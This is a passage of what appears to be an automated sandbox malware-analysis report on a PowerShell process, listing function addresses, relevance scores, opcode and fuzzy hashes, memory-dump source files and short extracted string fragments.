Opcode ID: 2ded30fbe9df0959b2bfd4fc79e342cd6d52ba6dd6a9066ff610f6d0ad237885
Instruction ID: cb31ad4239b282cf61017a8e21df9f8310a0c100abd9b158f10dc4de081e5847
Opcode Fuzzy Hash: 2ded30fbe9df0959b2bfd4fc79e342cd6d52ba6dd6a9066ff610f6d0ad237885
Instruction Fuzzy Hash: 085126F1B042059FCB209FB884036EBB7E2BFC5318F24846BD5058B255DB31E941CBA6

Function 075408F0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd884e6e75829e0803916812029835f6aeca875e13225a5fe0539ea8917fe7af
Instruction ID: 401cef3f8181ed5b9ff009b65de430035858ee72f12162cab5f0b305ef423b59
Opcode Fuzzy Hash: bd884e6e75829e0803916812029835f6aeca875e13225a5fe0539ea8917fe7af
Instruction Fuzzy Hash: 1D41E6B2B001159BDB54AFB988002EEB7A6FFC4314F3485AAD919DB381DE71D941CBE1

Function 0754946F Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6373385841bf8cef2269d9f6602a533ab7403301b948a828a14b816b7e78f99d
Instruction ID: 9d27425af22e57a59f02dc1018ff20cc4b939db45efe2f5fa81575075d840f63
Opcode Fuzzy Hash: 6373385841bf8cef2269d9f6602a533ab7403301b948a828a14b816b7e78f99d
Instruction Fuzzy Hash: 3B4106F0A04202DFCB218F6895036FB7BA2BF85318F19809BD5049F252D735F941CBA6

Function 02FB77F9 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36877cfe0a104e315311c339451542a136c7a840cc9a424061e87916a0bf2692
Instruction ID: a079e9ac4a6d6172bd19420c40783483031338bb7a459cf6e3c9e6031f068cd5
Opcode Fuzzy Hash: 36877cfe0a104e315311c339451542a136c7a840cc9a424061e87916a0bf2692
Instruction Fuzzy Hash: A4419031A002058FDB15EF65C854BA9BBF6EFC9394F084568D506EB7A0CF75AC41CB90

Function 07545E68 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963029b2fc875c6cfbc4434882e946f7c0ed33a8766a7961e6bf9e869d24d31e
Instruction ID: 5f931f8f6947e5a34f066626cb7520e4c98c8b1eb506be772e354a193840f4af
Opcode Fuzzy Hash: 963029b2fc875c6cfbc4434882e946f7c0ed33a8766a7961e6bf9e869d24d31e
Instruction Fuzzy Hash: 813119F17142029FCB159BB998012AEBBE2AFC5304F14847BD505CB292EF31C962C7A7

Function 02FB7A53 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e074bf6bc578242ef22e371eee43c91847ea91f0ea35da65a7cc47c2a7cff9a2
Instruction ID: 5abe5f7306227b7f42ae6853ffd70bf4654035bb9106c82023a7b0f1ce5cfe96
Opcode Fuzzy Hash: e074bf6bc578242ef22e371eee43c91847ea91f0ea35da65a7cc47c2a7cff9a2
Instruction Fuzzy Hash: 8A416C71E00208DFDB15EFA5D8447EDFBB2BF88340F15856AD006AB665DBB0A945CF90

Function 02FB2BB0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b65227af4624e16fdc0323244024a82852b4b2da3da6024dc0f428c2d75a628
Instruction ID: c2756eb225e8bc2e50507235d144283d36c8633e70de0f726a2b0015f2fb506d
Opcode Fuzzy Hash: 5b65227af4624e16fdc0323244024a82852b4b2da3da6024dc0f428c2d75a628
Instruction Fuzzy Hash: A84136B4A005098FCB06CF59C494AEAFBB1FF48354B25825AD916AB364C732FC51CFA4

Function 07540DE8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee7012c3ac80dee86217f1421a0a2f9708278b124a78f0879ff0453b391a889
Instruction ID: f0ef1597dcffecf80a8906de7b48681b80ed037b1cb9329f722b00245ffc52fb
Opcode Fuzzy Hash: bee7012c3ac80dee86217f1421a0a2f9708278b124a78f0879ff0453b391a889
Instruction Fuzzy Hash: FF217CB230031A9BDB645BBA48007B776C6BFC5318F34886E9709CB2C1CE75D96183A9

Function 02FBBCA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1d75e41c50400366f18733ccdf7d7d75d05336f30ee45e6fc1b4b5236e35635
Instruction ID: 8bbe6e04390be40cba51471f8103f7917aab34ddd4c4059f7f16b45761de78a3
Opcode Fuzzy Hash: a1d75e41c50400366f18733ccdf7d7d75d05336f30ee45e6fc1b4b5236e35635
Instruction Fuzzy Hash: 46312E30B011188FCB26DB64C8507EEB7B2AF49349F1444E9D909AB251DB359E81CF81

Function 07545E4B Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ee329b3d57e2518cbad78c22eb1f92e7c37416ba0c7f0aa51b498c072616db
Instruction ID: ca7115aaf14dcb696e1ecfe327355340f795757c6668f585380e4098ccbeba05
Opcode Fuzzy Hash: 69ee329b3d57e2518cbad78c22eb1f92e7c37416ba0c7f0aa51b498c072616db
Instruction Fuzzy Hash: CB21F5F1718301AFDB119BB598017FD7FE2AF85344F0844ABE4019B292EB758962C7A7

Function 075408D7 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e7c3ce053a770d68f0cf621055a2e584e3ddff904b1b2e4d0de781b25699ba
Instruction ID: 8fd3b29a84fa70c504c203b98abb408eaa51ba1006d9eb66b988b631346c618f
Opcode Fuzzy Hash: 41e7c3ce053a770d68f0cf621055a2e584e3ddff904b1b2e4d0de781b25699ba
Instruction Fuzzy Hash: 3A213AF29042599BCB559F7588501EABBE4BF85214B3884DACD0DD72C2E631AD40CBA0

Function 07540DCF Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f11ac76b050a92144d5be5f881ba838bff83d165b97ab4dc0abcdbfdb6fac8b
Instruction ID: 556c521cdddc12cccf4009157fbddd0cc08ff9cb45b40b622da4fd3546271196
Opcode Fuzzy Hash: 3f11ac76b050a92144d5be5f881ba838bff83d165b97ab4dc0abcdbfdb6fac8b
Instruction Fuzzy Hash: 8421B1B2304359ABD7600BB648007B73FD6AF86314F28449FD748DB2C2D679D9A4C768

Function 02FB95A8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578b675379c8eaad6a1eee0bd141281ed683cc57e750ca183d087fd9760b68b3
Instruction ID: c685b3a4da5f8b6b65bac6d3f4dbaf601b9c278004248924c15149d07432cf07
Opcode Fuzzy Hash: 578b675379c8eaad6a1eee0bd141281ed683cc57e750ca183d087fd9760b68b3
Instruction Fuzzy Hash: D5213574A042099FCB05CFACC8909AABBB5FF89310B158599E909EB352C731FC45CFA1

Function 02FB9597 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ef1a5179e46f6073b6d7f98d1a808ae8ccb3207e39ad798f1406f6267bd9abe
Instruction ID: 4011f1f7b063bc4bb1239c5b69cc8542e544a41d27e5c7dcf804fcb4c0beea4d
Opcode Fuzzy Hash: 1ef1a5179e46f6073b6d7f98d1a808ae8ccb3207e39ad798f1406f6267bd9abe
Instruction Fuzzy Hash: E1211A74A042499FCB01DFADC8909AABBB5FF89310B158199D949EB352C731FD41CFA1

Function 07540BD8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85488ac6988e36c2a68090f63e2b565ebadc49f04901f86789d0ecd22e9e853f
Instruction ID: dad3e218e5300d89e9c1e9c3954eaa69e3747be2225316e51f22f56195b771a3
Opcode Fuzzy Hash: 85488ac6988e36c2a68090f63e2b565ebadc49f04901f86789d0ecd22e9e853f
Instruction Fuzzy Hash: 57012076310216CBCB745AA9D4005BBF795EFC522AF24C47FDA4DC7281D631C845C760

Function 02CBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2538590435.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2cbd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60198a202aa4b06c8eaec2eb11ef774856a7e5ebc0b79d9ff598f3e9915d2670
Instruction ID: b1045cda4f1792a7d43680f1a15de7c8b17cc2f6fada46b79f02ef76a66347dd
Opcode Fuzzy Hash: 60198a202aa4b06c8eaec2eb11ef774856a7e5ebc0b79d9ff598f3e9915d2670
Instruction Fuzzy Hash: 10012B710053009AE7228A16DDC4BA7BF98DF81334F18C419ED4A0B142C7799941C6F1

Function 02FB9581 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2539158919.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6720fc46f4709ce60cd08784012651fcdd5ba66d708764a3e5879ccf8dc20ec0
Instruction ID: b19c784b13ed5f4f274b76498a688586e9af6cae36b47545e51bdc88caa2fe4b
Opcode Fuzzy Hash: 6720fc46f4709ce60cd08784012651fcdd5ba66d708764a3e5879ccf8dc20ec0
Instruction Fuzzy Hash: 7D014475A052448FC706CF6DD890AA9BBB5FF89314B1581E9C6459B362C732FC45CF50

Function 02CBD01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2538590435.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2cbd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c3b76a1704126a5e8bbf11038ae99e4fc707f0bb28f697c5f698ae75c756b2
Instruction ID: 635beb39b76e9b6f164839853178a6606dae6d4f9bd0d2d2d7c0458b63b9073e
Opcode Fuzzy Hash: 16c3b76a1704126a5e8bbf11038ae99e4fc707f0bb28f697c5f698ae75c756b2
Instruction Fuzzy Hash: 48F0C272004340AEE7218A15DD84BA2FF98EF91634F18C05AED484A286C3799881CAB0

Function 07540703 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f3c05241d5fdbc94a69d8a558095609c5ba366567c93d6a0cacd9b7f019f06
Instruction ID: 323ae021b413e649631847d4e8d7668590f33f90fc08c969aac05c254b4c0bea
Opcode Fuzzy Hash: 20f3c05241d5fdbc94a69d8a558095609c5ba366567c93d6a0cacd9b7f019f06
Instruction Fuzzy Hash: 11F0159021E3C16FE713037418226E53F31AF83244B5A00C7D284CF2E3C9590A4887B7

Non-executed Functions

Function 0754EF38 Relevance: 19.0, Strings: 15, Instructions: 300COMMON

Download Yara Rule

Strings

(kq, xrefs: 0754F1AE
(kq, xrefs: 0754F1B8
tPeq, xrefs: 0754F089
84ll, xrefs: 0754F132
(kq, xrefs: 0754F14A
tPeq, xrefs: 0754F184
$eq, xrefs: 0754EFB5
(kq, xrefs: 0754F1ED
84ll, xrefs: 0754F036
84ll, xrefs: 0754F040
84ll, xrefs: 0754F13C
4'eq, xrefs: 0754F268
4'eq, xrefs: 0754F25C
tPeq, xrefs: 0754F095
tPeq, xrefs: 0754F190

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$84ll$84ll$84ll$84ll$tPeq$tPeq$tPeq$tPeq$$eq$(kq$(kq$(kq$(kq
API String ID: 0-218046383
Opcode ID: c0bf4b4047ca4474cfac404fab6a5dd82ac819cf7852c9df6791400f5543c9d1
Instruction ID: aca48141f3f7de97d77a4dab977e3e87a644b70c953cdb0566c4b852dcac3404
Opcode Fuzzy Hash: c0bf4b4047ca4474cfac404fab6a5dd82ac819cf7852c9df6791400f5543c9d1
Instruction Fuzzy Hash: 59A1A7B57101169FCB249F5CC805BAABBF2FF89318F19846AE8059B2D5CB31DD41CBA1

Function 0754B950 Relevance: 16.7, Strings: 13, Instructions: 492COMMON

Download Yara Rule

Strings

x._k, xrefs: 0754C099
4'eq, xrefs: 0754BDC2
(fnl, xrefs: 0754BAC3
(fnl, xrefs: 0754BC89
tL`k, xrefs: 0754BAA3
4'eq, xrefs: 0754BE66
-_k, xrefs: 0754C0E7
(fnl, xrefs: 0754BBB9
tL`k, xrefs: 0754BB99
(fnl, xrefs: 0754BFB5
(fnl, xrefs: 0754BF4F
4'eq, xrefs: 0754BE7C
4'eq, xrefs: 0754BDD8

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl$(fnl$4'eq$4'eq$4'eq$4'eq$tL`k$tL`k$x._k$-_k
API String ID: 0-1246074341
Opcode ID: ddf2f8e25a15026087c7cd6ebf833ea2a990e8b4f0c51ac947ebd9ab0aea7f45
Instruction ID: d344a626df367102dbb9127b488b107850d2c9abc253a7d1335895565d8c0e90
Opcode Fuzzy Hash: ddf2f8e25a15026087c7cd6ebf833ea2a990e8b4f0c51ac947ebd9ab0aea7f45
Instruction Fuzzy Hash: DA226DB0A05218DFDB24DB64C850BDABBB2BF89304F1085DAD5096B781CB72ED81CF95

Function 0754EBE8 Relevance: 16.5, Strings: 13, Instructions: 241COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754EC63
tPeq, xrefs: 0754ED62
$eq, xrefs: 0754EE24
tPeq, xrefs: 0754ED56
4'eq, xrefs: 0754EE46
84ll, xrefs: 0754ED04
TQjq, xrefs: 0754EDFA
$eq, xrefs: 0754EE14
TQjq, xrefs: 0754EDEA
4'eq, xrefs: 0754EE52
TQjq, xrefs: 0754EC42
$eq, xrefs: 0754EC84
84ll, xrefs: 0754ED0E

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$84ll$84ll$TQjq$TQjq$TQjq$tPeq$tPeq$$eq$$eq$$eq$$eq
API String ID: 0-1395665421
Opcode ID: 7085fbe76a1199fd4b663b407bb5e56e03d9b67ca283ed1b79d6d825fa320cf9
Instruction ID: f54ff7ac09eae4dcb45da821b510e90685723d9eb5144e2c086d41916c6edd56
Opcode Fuzzy Hash: 7085fbe76a1199fd4b663b407bb5e56e03d9b67ca283ed1b79d6d825fa320cf9
Instruction Fuzzy Hash: EF81D5B171011ADFCF25CF68C4066EABBA2FF85315F58886EE8059B281CB31DC51CBA5

Function 0754B937 Relevance: 14.2, Strings: 11, Instructions: 459COMMON

Download Yara Rule

Strings

x._k, xrefs: 0754C099
(fnl, xrefs: 0754BBB9
4'eq, xrefs: 0754BDC2
(fnl, xrefs: 0754BAC3
(fnl, xrefs: 0754BC89
tL`k, xrefs: 0754BB99
tL`k, xrefs: 0754BAA3
(fnl, xrefs: 0754BFB5
(fnl, xrefs: 0754BF4F
4'eq, xrefs: 0754BE66
-_k, xrefs: 0754C0E7

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: (fnl$(fnl$(fnl$(fnl$(fnl$4'eq$4'eq$tL`k$tL`k$x._k$-_k
API String ID: 0-1975115165
Opcode ID: def7890b761fc43e9638e005151208c193f7aed6b2783e332becaf76b866262e
Instruction ID: 6367b23638429dfd80d1e7acd9db6b13ca0f709790eb47149071cdf883251be4
Opcode Fuzzy Hash: def7890b761fc43e9638e005151208c193f7aed6b2783e332becaf76b866262e
Instruction Fuzzy Hash: 05225BB0A05214DFDB24DF64C850BDABBB2BF89304F10859AD5096B781CB72EE81CF95

Function 0754F5F0 Relevance: 12.8, Strings: 10, Instructions: 280COMMON

Download Yara Rule

Strings

tPeq, xrefs: 0754F796
$eq, xrefs: 0754F66B
84ll, xrefs: 0754F73A
$eq, xrefs: 0754F68C
$eq, xrefs: 0754F85A
$eq, xrefs: 0754F84A
tPeq, xrefs: 0754F78A
4'eq, xrefs: 0754F8CE
84ll, xrefs: 0754F744
4'eq, xrefs: 0754F8C2

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$84ll$84ll$tPeq$tPeq$$eq$$eq$$eq$$eq
API String ID: 0-2778128467
Opcode ID: 9da13bb7d94448e051c843e4e9eb22979add66c3e2746e89d8ff2a86b54fd45b
Instruction ID: a2f3d6ec15391e4f9a1787924b8fefb890f931711212e1bd1301249a00d1f9c3
Opcode Fuzzy Hash: 9da13bb7d94448e051c843e4e9eb22979add66c3e2746e89d8ff2a86b54fd45b
Instruction Fuzzy Hash: D5A1A2B171020AEFDB258F69C8057EA77A2FF85318F188466E9059B2D5CB35DC81CBA1

Function 0754EF1B Relevance: 11.5, Strings: 9, Instructions: 209COMMON

Download Yara Rule

Strings

(kq, xrefs: 0754F1AE
(kq, xrefs: 0754F1B8
84ll, xrefs: 0754F036
tPeq, xrefs: 0754F089
84ll, xrefs: 0754F132
4'eq, xrefs: 0754F25C
(kq, xrefs: 0754F14A
tPeq, xrefs: 0754F184
$eq, xrefs: 0754EFB5

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$84ll$84ll$tPeq$tPeq$$eq$(kq$(kq$(kq
API String ID: 0-3785692934
Opcode ID: 3a016bd71f0d2f2296b6cd6a6f40f6a6850d200c86cf440340852a4869d2e7e4
Instruction ID: 3dbf048f182efe136e9f7780952a8bac232dd21df7d7e6bdbff83bbad1506f4a
Opcode Fuzzy Hash: 3a016bd71f0d2f2296b6cd6a6f40f6a6850d200c86cf440340852a4869d2e7e4
Instruction Fuzzy Hash: 5771B1B06042469FDB248F58C945BEABBF2FF85218F1D849BE8059B2D1C731DC81CBA1

Function 0754F9B8 Relevance: 10.2, Strings: 8, Instructions: 210COMMON

Download Yara Rule

Strings

tPeq, xrefs: 0754FABC
XRjq, xrefs: 0754FA19
84ll, xrefs: 0754FA71
$eq, xrefs: 0754FA35
tPeq, xrefs: 0754FAC8
84ll, xrefs: 0754FA67
XRjq, xrefs: 0754FB4D
XRjq, xrefs: 0754FB5D

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 84ll$84ll$XRjq$XRjq$XRjq$tPeq$tPeq$$eq
API String ID: 0-3122287840
Opcode ID: f317652987e9e78952c930f6d22f61aaaa78d7fab15365866a7729dbc2285f94
Instruction ID: 09780a73c22f8801eb5c0d76453acd7854cd82b1efc5800a30680135933bb275
Opcode Fuzzy Hash: f317652987e9e78952c930f6d22f61aaaa78d7fab15365866a7729dbc2285f94
Instruction Fuzzy Hash: 1B71B1B1B041059FCB249F6DC445AAABBE2BF89314F28C46AE8059B3D5CB31DD41CBA1

Function 075476D8 Relevance: 10.2, Strings: 8, Instructions: 183COMMON

Download Yara Rule

Strings

$eq, xrefs: 07547751
$eq, xrefs: 0754784E
tPeq, xrefs: 075477D3
$eq, xrefs: 07547735
4'eq, xrefs: 0754788F
tPeq, xrefs: 075477DF
$eq, xrefs: 0754785E
4'eq, xrefs: 07547883

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$$eq$$eq
API String ID: 0-723692213
Opcode ID: 0ee948dc1177f0f8071b930d2a4b4eac9112d981511c2ed32af53c074959f9f2
Instruction ID: e2c888ee676b3183fedfefba3b52eb7996af1dcb996d18b8c8ddd73afd593146
Opcode Fuzzy Hash: 0ee948dc1177f0f8071b930d2a4b4eac9112d981511c2ed32af53c074959f9f2
Instruction Fuzzy Hash: 395118B1B10106DFEB249F69C401AEABBA2FF8C314F54C86AD4159B385DB31DD41CB91

Function 0754EBCB Relevance: 10.2, Strings: 8, Instructions: 165COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754EC63
4'eq, xrefs: 0754EE46
84ll, xrefs: 0754ED04
$eq, xrefs: 0754EE14
TQjq, xrefs: 0754EDEA
TQjq, xrefs: 0754EC42
$eq, xrefs: 0754EC84
tPeq, xrefs: 0754ED56

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$84ll$TQjq$TQjq$tPeq$$eq$$eq$$eq
API String ID: 0-4048317654
Opcode ID: e1aadc355cc39fd9779312303eeb9c5686f1347b7c456d31351c564c13000493
Instruction ID: c00b75453280f1065e46fbef3927bd60f1b95ecb29876ef787c9f7bbd45f8cc3
Opcode Fuzzy Hash: e1aadc355cc39fd9779312303eeb9c5686f1347b7c456d31351c564c13000493
Instruction Fuzzy Hash: 4A51B0B0A00206DFDB39CF14C5067EABBB2BF45319F1988ABE8059B291C771DC55CB96

Function 07548B08 Relevance: 8.9, Strings: 7, Instructions: 112COMMON

Download Yara Rule

Strings

tPeq, xrefs: 07548B85
tPeq, xrefs: 07548B91
$eq, xrefs: 07548B1A
$eq, xrefs: 07548B4C
dl, xrefs: 07548BEF
$eq, xrefs: 07548B40
dl, xrefs: 07548BFD

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: tPeq$tPeq$$eq$$eq$$eq$dl$dl
API String ID: 0-3446449798
Opcode ID: 2051e1f26565d9bffc0a8f2d95f6d111b7fc31cd097bb9808b6e094074703fb8
Instruction ID: 9c7dac220a7810ae43b9644c0ed37d33f6ca87383d0e7244dc549fdd1a88fb5d
Opcode Fuzzy Hash: 2051e1f26565d9bffc0a8f2d95f6d111b7fc31cd097bb9808b6e094074703fb8
Instruction Fuzzy Hash: 883103B27042158FDB248F69D8046AABBE6FFC5724F28846BE545CB391CA32EC41C791

Function 07548208 Relevance: 8.9, Strings: 7, Instructions: 112COMMON

Download Yara Rule

Strings

tPeq, xrefs: 07548285
$eq, xrefs: 0754824C
dl, xrefs: 075482FD
tPeq, xrefs: 07548291
$eq, xrefs: 0754821A
$eq, xrefs: 07548240
dl, xrefs: 075482EF

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: tPeq$tPeq$$eq$$eq$$eq$dl$dl
API String ID: 0-3446449798
Opcode ID: e7a19f04055b8ff7d4ac073ab45af964c85440d43e9a093bdfb80833b1d8e4ae
Instruction ID: d5555e2dae150c0e05f13959cf5b94b8a3ead213387463f6e6292ecc987cf3e9
Opcode Fuzzy Hash: e7a19f04055b8ff7d4ac073ab45af964c85440d43e9a093bdfb80833b1d8e4ae
Instruction Fuzzy Hash: 3D3105B27086158FDB148F69D4006AABBE6FFC5724B24856FE905CB351CA32EC41C791

Function 0754F5D3 Relevance: 7.7, Strings: 6, Instructions: 199COMMON

Download Yara Rule

Strings

$eq, xrefs: 0754F66B
84ll, xrefs: 0754F73A
$eq, xrefs: 0754F68C
$eq, xrefs: 0754F84A
tPeq, xrefs: 0754F78A
4'eq, xrefs: 0754F8C2

Memory Dump Source

Source File: 00000002.00000002.2545336321.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7540000_powershell.jbxd

Similarity

API ID:
String ID: 4'eq$84ll$tPeq$$eq$$eq$$eq
API String ID: 0-3653295611
Opcode ID: 1dd0d877f1c504456b7a674fab92961041b39770f7ad489b17b61dbb9c495e5c
Instruction ID: cb0732586b9a9549cc57b20c770b85b95ee7b7119c6575321bafc729009706b1
Opcode Fuzzy Hash: 1dd0d877f1c504456b7a674fab92961041b39770f7ad489b17b61dbb9c495e5c
Instruction Fuzzy Hash: EB718FB0600246EFEB258F19C944BEA77B2FF45319F1D8467E805AB2E1C735D981CBA1

Function 0754B5B8 Relevance: 7.6, Strings: 6, Instructions: 123COMMON

Download Yara Rule

Strings

tPeq, xrefs: 0754B687
4'eq, xrefs: 0754B63D
84ll, xrefs: 0754B618
84ll, xrefs: 0754B622
4'eq, xrefs: 0754B631
tPeq, xrefs: 0754B693

Memory Dump Source

